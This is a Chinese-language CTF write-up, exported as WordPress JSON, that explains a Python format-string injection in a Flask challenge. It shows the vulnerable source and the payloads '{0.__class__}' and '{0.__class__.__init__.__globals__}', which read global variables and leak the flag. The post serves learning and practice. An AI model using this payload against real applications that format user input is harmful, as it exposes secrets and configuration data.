![\"Pasted](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/01\/Pasted-image-20260122115049.png\")
<\/p>\n<\/p>\n
\u83b7\u5f97\u6e90\u7801
\n![\"Pasted](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/01\/Pasted-image-20260122112336.png\")
<\/p>\n
from flask import Flask, render_template, request\nfrom flag import flag, FLAG\nimport datetime\n\napp = Flask(__name__)\n\n\n@app.route("\/", methods=['GET', 'POST'])\ndef index():\n f = open("app.py", "r")\n ctx = f.read()\n f.close()\n f1ag = request.args.get('f1ag') or ""\n exp = request.args.get('exp') or ""\n flAg = FLAG(f1ag)\n message = "Your flag is {0}" + exp\n if exp == "":\n return ctx\n else:\n return message.format(flAg)\n\n\nif __name__ == "__main__":\n app.run()\n<\/code><\/pre>\n\u9996\u5148\u770b\u4ee3\u7801get\u8bf7\u6c42\u4f20\u5165f1ag\u548cexp\u5e76\u4e14\u5c06f1ag\u4f20\u5165FLAG\u51fd\u6570\u91cc\u9762\uff0c\u5e76\u4e14\u5c06FLAG\u7684\u8fd4\u56de\u503cf1Ag\u4e0eexp\u62fc\u63a5\u5b58\u5728message\u53d8\u91cf\u91cc\uff0c\u5982\u679cexp\u5b58\u5728\u503c\u7684\u8bdd\u5c31\u8fd4\u56de\u62fc\u63a5\u540e\u7684\u5b57\u7b26\u4e32\u3002<\/p>\n
\u4e09\u3001\u6784\u9020payload<\/h1>\n
\u53c2\u8003\u6587\u7ae0\uff1a<\/p>\n
https:\/\/c1oudfl0w0.github.io\/blog\/2023\/07\/30\/python-%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E\/\n<\/code><\/pre>\n\u53ef\u4ee5\u770b\u5230message = "Your flag is {0}" + exp<\/code>\u5b58\u5728python\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\uff0c\u6ce8\u610f\u8fd9\u548cssti\u662f\u6709\u533a\u522b\u7684\uff0c\u53ea\u80fd\u8bfb\u53d6\u4e0d\u80fd\u6267\u884c\u65b9\u6cd5<\/p>\nformat\u51fd\u6570\u662fpython\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u7684\u4e00\u79cd\u65b9\u6cd5\uff0c{0}<\/code>\u7528\u4e8e\u5360\u4f4d\uff0c\u5176\u4e2d\u7684\u6570\u5b57\u5bf9\u5e94\u51fd\u6570\u53c2\u6570\u7684\u4e0b\u6807<\/p>\n"I am {1},he is {0}".format("a","b")\n<\/code><\/pre>\n![\"Pasted](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/01\/Pasted-image-20260122115503.png\")
<\/p>\n
\u6211\u4eec\u77e5\u9053format\u4f1a\u628af1Ag\u7684\u503c\u5e26\u5165\u5230\u53d8\u91cfmessage"Your flag is {0}"\u4e2d\u7684{0},\u6240\u4ee5\u6211\u4eec\u8ba9exp\u4e2d\u4e5f\u6709\u4e00\u4e2a{0}\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u5c06f1Ag\u4e2d\u7684\u503c\u4ee3\u5165\u8fdb\u53bb\uff0c\u7136\u540e\u627e\u5230\u4ed6\u7684\u6240\u5c5e\u7c7b\uff0c\u7136\u540e\u627e\u5230FLAG\u4e2d\u7684\u5168\u5c40\u53d8\u91cfflag\u3002<\/p>\n
f1ag=1&exp={0.__class__}\n<\/code><\/pre>\n\u7c7b\u4f3c\u4e8e\uff1a<\/p>\n
message = "Your flag is {0}" + {0.__class__}\n<\/code><\/pre>\n\u6210\u529f\u83b7\u53d61\u6240\u5c5e\u7684\u7c7b
\n![\"Pasted](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/01\/Pasted-image-20260122165017.png\")
<\/p>\n
\u56e0\u4e3a\u53ea\u80fd\u8bfb\u53d6\uff0c\u6240\u4ee5\u53ef\u4ee5\u8bfb\u53d6\u73af\u5883\u53d8\u91cf\u6765\u83b7\u53d6\u654f\u611f\u4fe1\u606f
\npayload\uff1a<\/p>\n
{0.__class__.__init__.__globals__}\n<\/code><\/pre>\n\u56db\u3001\u83b7\u53d6flag<\/h1>\nf1ag=1&exp={0.__class__.__init__.__globals__}\n<\/code><\/pre>\n![\"Pasted](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/01\/Pasted-image-20260122114552.png\")
<\/p>\n
\u603b\u7ed3<\/h1>\n\n- python\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e
\n\u5229\u7528format\u51fd\u6570\u7684\u7279\u6027\u6765\u8f93\u51fa\u51fd\u6570\u53c2\u6570\u7684\u5c5e\u6027\uff0c\u83b7\u53d6\u654f\u611f\u4fe1\u606f<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"\u4e00\u3001\u8bbf\u95ee\u7f51\u7ad9 \u83b7\u5f97\u6e90\u7801 \u4e8c\u3001\u5206\u6790\u6e90\u7801 from flask import Flask, render_temp […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,22,23],"tags":[89],"class_list":["post-2992","post","type-post","status-publish","format-standard","hentry","category-ctf","category-ctf-web","category-nssctf","tag-python"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2992","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=2992"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2992\/revisions"}],"predecessor-version":[{"id":2993,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2992\/revisions\/2993"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=2992"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=2992"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=2992"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}